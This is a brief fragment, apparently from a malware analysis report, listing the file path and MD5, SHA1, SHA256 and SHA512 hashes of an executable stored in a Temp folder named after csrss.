SHA512 a8cb7a64925de0fc41a5a3e9d11e62a39c14b421ce2a01f55615cdef9000757277fb78d98dcfa0473c4d1d3c89042eac3d7e8e25a9b2ddb65f0db21625aaae17

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 1bf850b4d9587c1017a75a47680584c4
SHA1 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256 ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512 ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08